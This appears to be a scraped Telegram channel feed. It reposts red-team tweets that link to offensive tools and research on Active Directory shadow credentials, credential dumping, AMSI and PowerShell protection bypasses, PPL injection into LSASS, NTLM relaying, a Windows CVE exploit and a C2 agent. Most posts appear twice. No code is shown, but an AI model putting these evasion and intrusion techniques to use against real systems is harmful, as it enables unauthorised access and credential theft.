😈 [ Ellis Springe @knavesec ]
Dropping a one-off script to pull arbitrary AD attributes from ADExplorer snapshots. @0xBoku and I used this on a recent op to pull custom attributes that listed Computer objects owned by specific users so we could correlate high-value targets to systems:
🔗 https://github.com/c3c/ADExplorerSnapshot.py/pull/66
🐥 [ tweet ]
Dropping a one-off script to pull arbitrary AD attributes from ADExplorer snapshots. @0xBoku and I used this on a recent op to pull custom attributes that listed Computer objects owned by specific users so we could correlate high-value targets to systems:
🔗 https://github.com/c3c/ADExplorerSnapshot.py/pull/66
🐥 [ tweet ]
🔥3
😈 [ RedTeam Pentesting @RedTeamPT ]
🎉 We've just released 🔐 keycred 🎉
A cross-platform tool for handling Active Directory Shadow Credentials/msDS-KeyCredentialLink 🔑.
It supports UnPAC-the-Hash/PKINIT, Pass-the-Cert, Channel Binding and more 💪🚀
🔥 Get it while it's still hot! 🔥
🔗 https://github.com/RedTeamPentesting/keycred
🐥 [ tweet ]
🎉 We've just released 🔐 keycred 🎉
A cross-platform tool for handling Active Directory Shadow Credentials/msDS-KeyCredentialLink 🔑.
It supports UnPAC-the-Hash/PKINIT, Pass-the-Cert, Channel Binding and more 💪🚀
🔥 Get it while it's still hot! 🔥
🔗 https://github.com/RedTeamPentesting/keycred
🐥 [ tweet ]
👍8🥱6
😈 [ Synacktiv @Synacktiv ]
In our latest article, @l4x4 revisits the secretsdump implementation, offering an alternative avoiding reg save and eliminates writing files to disk, significantly reducing the likelihood of triggering security alerts. Read the details at .
🔗 https://www.synacktiv.com/publications/lsa-secrets-revisiting-secretsdump
🐥 [ tweet ]
In our latest article, @l4x4 revisits the secretsdump implementation, offering an alternative avoiding reg save and eliminates writing files to disk, significantly reducing the likelihood of triggering security alerts. Read the details at .
🔗 https://www.synacktiv.com/publications/lsa-secrets-revisiting-secretsdump
🐥 [ tweet ]
🥱4🔥3
😈 [ TrustedSec @TrustedSec ]
In our new #blog, Senior Research Analyst @codewhisperer84 unveils his new tool DIT Explorer which he created after researching NTDS.dit files on Active Directory. Read part one of this series now to find out what this tool can do!
🔗 https://trustedsec.com/blog/exploring-ntds-dit-part-1-cracking-the-surface-with-dit-explorer
🐥 [ tweet ]
In our new #blog, Senior Research Analyst @codewhisperer84 unveils his new tool DIT Explorer which he created after researching NTDS.dit files on Active Directory. Read part one of this series now to find out what this tool can do!
🔗 https://trustedsec.com/blog/exploring-ntds-dit-part-1-cracking-the-surface-with-dit-explorer
🐥 [ tweet ]
👍3🥱3
😈 [ Orange Cyberdefense Switzerland @orangecyberch ]
💻🛡️In this blog post, Clément Labro explains how he developed a tool that lets you run Powershell without the various system protections.
👉 Discover this article on our blog:
🔗 https://blog.scrt.ch/2025/02/18/reinventing-powershell-in-c-c
🐥 [ tweet ]
💻🛡️In this blog post, Clément Labro explains how he developed a tool that lets you run Powershell without the various system protections.
👉 Discover this article on our blog:
🔗 https://blog.scrt.ch/2025/02/18/reinventing-powershell-in-c-c
🐥 [ tweet ]
👍5🥱3🔥2
DFS Targets & Links
Чтобы не делать так:
🔗 https://ppn.snovvcra.sh/pentest/infrastructure/ad/post-exploitation#locate-dfs-targets
Теперь можно делать так:
🔗 https://github.com/c3c/ADExplorerSnapshot.py/pull/67
Чтобы не делать так:
🔗 https://ppn.snovvcra.sh/pentest/infrastructure/ad/post-exploitation#locate-dfs-targets
Теперь можно делать так:
🔗 https://github.com/c3c/ADExplorerSnapshot.py/pull/67
🔥7
😈 [ Octoberfest7 @Octoberfest73 ]
Really cool repo I came across that reverses/reimplements LoadLibrary. Very useful to have a chart / code depicting what all happens and when
🔗 https://github.com/paskalian/WID_LoadLibrary
🐥 [ tweet ]
Really cool repo I came across that reverses/reimplements LoadLibrary. Very useful to have a chart / code depicting what all happens and when
🔗 https://github.com/paskalian/WID_LoadLibrary
🐥 [ tweet ]
😈 [ Rtl Dallas @RtlDallas ]
New update for Draugr! 🙂
Now supports indirect syscalls with a synthetic stack frame. I’ve removed Draugr-Strike and replaced it with Cobalt Strike's process injection kit (Thread Spoof or Early Bird) using indirect syscalls and a synthetic stack frame.
🔗 https://github.com/NtDallas/Draugr
🐥 [ tweet ]
New update for Draugr! 🙂
Now supports indirect syscalls with a synthetic stack frame. I’ve removed Draugr-Strike and replaced it with Cobalt Strike's process injection kit (Thread Spoof or Early Bird) using indirect syscalls and a synthetic stack frame.
🔗 https://github.com/NtDallas/Draugr
🐥 [ tweet ]
😁2
😈 [ 0SKR @saab_sec ]
❗ Blog Alert ❗
🔴 Introducing a thread hijacking ttp variant called Phantom call.
🔴 Discussion on effect of stack alignment on SIM instructions/registers.
🔴 In depth analysis of Win32 api
🔴 Weaponizing
🔗 https://sabotagesec.com/thread-hijacking-iceberg-deep-dive-into-phantom-call-rtlremotecall/
🐥 [ tweet ]
❗ Blog Alert ❗
🔴 Introducing a thread hijacking ttp variant called Phantom call.
🔴 Discussion on effect of stack alignment on SIM instructions/registers.
🔴 In depth analysis of Win32 api
RtlRemoteCall🔴 Weaponizing
RtlRemoteCall🔗 https://sabotagesec.com/thread-hijacking-iceberg-deep-dive-into-phantom-call-rtlremotecall/
🐥 [ tweet ]
🔥7👍4🤯4
Мир, труд, май и PHDays 2025 (22–24 мая)
Грядущий ПэХэДэйз будет особенным, ведь в довесок ко всем стандартным вкусностям в виде докладов, наливайки и нетворкинга с коллегами вас ждет порция хардкор-стайл материала для Offense-трека, где мы (a.k.a.🟥 SWARM) будем говорить на сложные темы наступательной кибербезопасности. Ответственно разглашенные нолики, непубличные TTP продвинутых атакующих, инструментарий уровня APT, невыдуманные кейсы с проектов, о которых невозможно молчать, и многое другое.
В остальном по классике:
🤖 Форум и фестиваль в кибергороде
🗡 Кибербитва (a.k.a. Standoff 15)
🔭 Научпоп и искусство
👨🎓 Практикумы и воркшопы
Ну и, разумеется, самое главное — боевой клич на CFP прямо🔜 здесь 🔙
Грядущий ПэХэДэйз будет особенным, ведь в довесок ко всем стандартным вкусностям в виде докладов, наливайки и нетворкинга с коллегами вас ждет порция хардкор-стайл материала для Offense-трека, где мы (a.k.a.
В остальном по классике:
Ну и, разумеется, самое главное — боевой клич на CFP прямо
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥41👍12🍌11🥱9😢2
😈 [ S3cur3Th1sSh1t @ShitSecure ]
Bypass AMSI in 2025, my newest blog post is published 🥳! A review on what changed over the last years and what's still efficient today.
🔗 https://en.r-tec.net/r-tec-blog-bypass-amsi-in-2025.html
🐥 [ tweet ]
Bypass AMSI in 2025, my newest blog post is published 🥳! A review on what changed over the last years and what's still efficient today.
🔗 https://en.r-tec.net/r-tec-blog-bypass-amsi-in-2025.html
🐥 [ tweet ]
🔥19
😈 [ Synacktiv @Synacktiv ]
In our latest article, @croco_byte and @SScaum demonstrate a trick allowing to make Windows SMB clients fall back to WebDav HTTP authentication, enhancing the NTLM and Kerberos relaying capabilities of multicast poisoning attacks!
🔗 https://www.synacktiv.com/publications/taking-the-relaying-capabilities-of-multicast-poisoning-to-the-next-level-tricking
🐥 [ tweet ]
In our latest article, @croco_byte and @SScaum demonstrate a trick allowing to make Windows SMB clients fall back to WebDav HTTP authentication, enhancing the NTLM and Kerberos relaying capabilities of multicast poisoning attacks!
🔗 https://www.synacktiv.com/publications/taking-the-relaying-capabilities-of-multicast-poisoning-to-the-next-level-tricking
🐥 [ tweet ]
👍7🥱3
😈 [ T3nb3w @T3nb3w ]
🚀 New Blog & PoC: Abusing IDispatch for COM Object Access & PPL Injection
Leveraging STDFONT via IDispatch to inject into PPL processes & access LSASS. Inspired by James Forshaw's research!
Blog:
🔗 https://mohamed-fakroud.gitbook.io/red-teamings-dojo/abusing-idispatch-for-trapped-com-object-access-and-injecting-into-ppl-processes
Code:
🔗 https://github.com/T3nb3w/ComDotNetExploit
Original:
🔗 https://googleprojectzero.blogspot.com/2025/01/windows-bug-class-accessing-trapped-com.html
🐥 [ tweet ]
🚀 New Blog & PoC: Abusing IDispatch for COM Object Access & PPL Injection
Leveraging STDFONT via IDispatch to inject into PPL processes & access LSASS. Inspired by James Forshaw's research!
Blog:
🔗 https://mohamed-fakroud.gitbook.io/red-teamings-dojo/abusing-idispatch-for-trapped-com-object-access-and-injecting-into-ppl-processes
Code:
🔗 https://github.com/T3nb3w/ComDotNetExploit
Original:
🔗 https://googleprojectzero.blogspot.com/2025/01/windows-bug-class-accessing-trapped-com.html
🐥 [ tweet ]
🤯5🥱3
😈 [ Mayfly @M4yFly ]
New Active Directory Mindmap v2025.03! 🚀
📖 Readable version:
🔗 https://orange-cyberdefense.github.io/ocd-mindmaps/img/mindmap_ad_dark_classic_2025.03.excalidraw.svg
🔧 Now fully generated from markdown files — way easier to update and maintain!
💡 Got improvements? PRs welcome! 👇
🔗 https://github.com/Orange-Cyberdefense/ocd-mindmaps/tree/main/excalimap/mindmap/ad
🐥 [ tweet ]
New Active Directory Mindmap v2025.03! 🚀
📖 Readable version:
🔗 https://orange-cyberdefense.github.io/ocd-mindmaps/img/mindmap_ad_dark_classic_2025.03.excalidraw.svg
🔧 Now fully generated from markdown files — way easier to update and maintain!
💡 Got improvements? PRs welcome! 👇
🔗 https://github.com/Orange-Cyberdefense/ocd-mindmaps/tree/main/excalimap/mindmap/ad
🐥 [ tweet ]
🔥23👍9🥱2
😈 [ TrustedSec @TrustedSec ]
A Red Team engagement is a serious commitment for any org who wants to improve their security posture. In our new blog, @curi0usJack breaks down some goals of a Red Team engagement so that you can better measure its success. Read it now!
🔗 https://trustedsec.com/blog/measuring-the-success-of-your-adversary-simulations
🐥 [ tweet ]
A Red Team engagement is a serious commitment for any org who wants to improve their security posture. In our new blog, @curi0usJack breaks down some goals of a Red Team engagement so that you can better measure its success. Read it now!
🔗 https://trustedsec.com/blog/measuring-the-success-of-your-adversary-simulations
🐥 [ tweet ]
🔥6🥱6🤔1
😈 [ 📔 Michael Grafnetter @MGrafnetter ]
New Indicator of Compromise (IoC) by the NTLM Relay Attack with Shadow Credentials, thanks to bugs in Impacket, a popular Python implementation. Will probably be fixed in the near future.
🔗 https://www.dsinternals.com/en/indicator-of-compromise-shadow-credentials-ntlm-relay-impacket/
🐥 [ tweet ]
New Indicator of Compromise (IoC) by the NTLM Relay Attack with Shadow Credentials, thanks to bugs in Impacket, a popular Python implementation. Will probably be fixed in the near future.
🔗 https://www.dsinternals.com/en/indicator-of-compromise-shadow-credentials-ntlm-relay-impacket/
🐥 [ tweet ]
👍5
😈 [ MrAle98 @MrAle_98 ]
Hey there,
Finally published the article on the exploit for CVE-2025-21333-POC exploit.
Here the link to the article:
🔗 https://medium.com/@ale18109800/cve-2025-21333-windows-heap-based-buffer-overflow-analysis-d1b597ae4bae
🐥 [ tweet ]
Hey there,
Finally published the article on the exploit for CVE-2025-21333-POC exploit.
Here the link to the article:
🔗 https://medium.com/@ale18109800/cve-2025-21333-windows-heap-based-buffer-overflow-analysis-d1b597ae4bae
🐥 [ tweet ]
🔥8
😈 [ Oddvar Moe @Oddvarmoe ]
TIL, the attribute userWorkstations is still in play in modern windows 🤯
If you set the attribute on a user to something random the user cannot login to the computers anymore. Need privs to adjust, but I can see potential when you want to lock someone out for a while
🐥 [ tweet ]
TIL, the attribute userWorkstations is still in play in modern windows 🤯
If you set the attribute on a user to something random the user cannot login to the computers anymore. Need privs to adjust, but I can see potential when you want to lock someone out for a while
🐥 [ tweet ]
👍15😁4🤔4
😈 [ c0rnbread @0xC0rnbread ]
Today I'm releasing Xenon, a custom Mythic agent for Windows targets written in C.
Notable features include:
📁 Modular command/code inclusion
🦠 Malleable C2 Profile support
🪨 Compatible with Cobalt Strike BOFs
🔗 https://github.com/MythicAgents/Xenon
Blog series:
🔗 https://c0rnbread.com/creating-mythic-c2-agent-part1/
🐥 [ tweet ]
Today I'm releasing Xenon, a custom Mythic agent for Windows targets written in C.
Notable features include:
📁 Modular command/code inclusion
🦠 Malleable C2 Profile support
🪨 Compatible with Cobalt Strike BOFs
🔗 https://github.com/MythicAgents/Xenon
Blog series:
🔗 https://c0rnbread.com/creating-mythic-c2-agent-part1/
🐥 [ tweet ]
👍6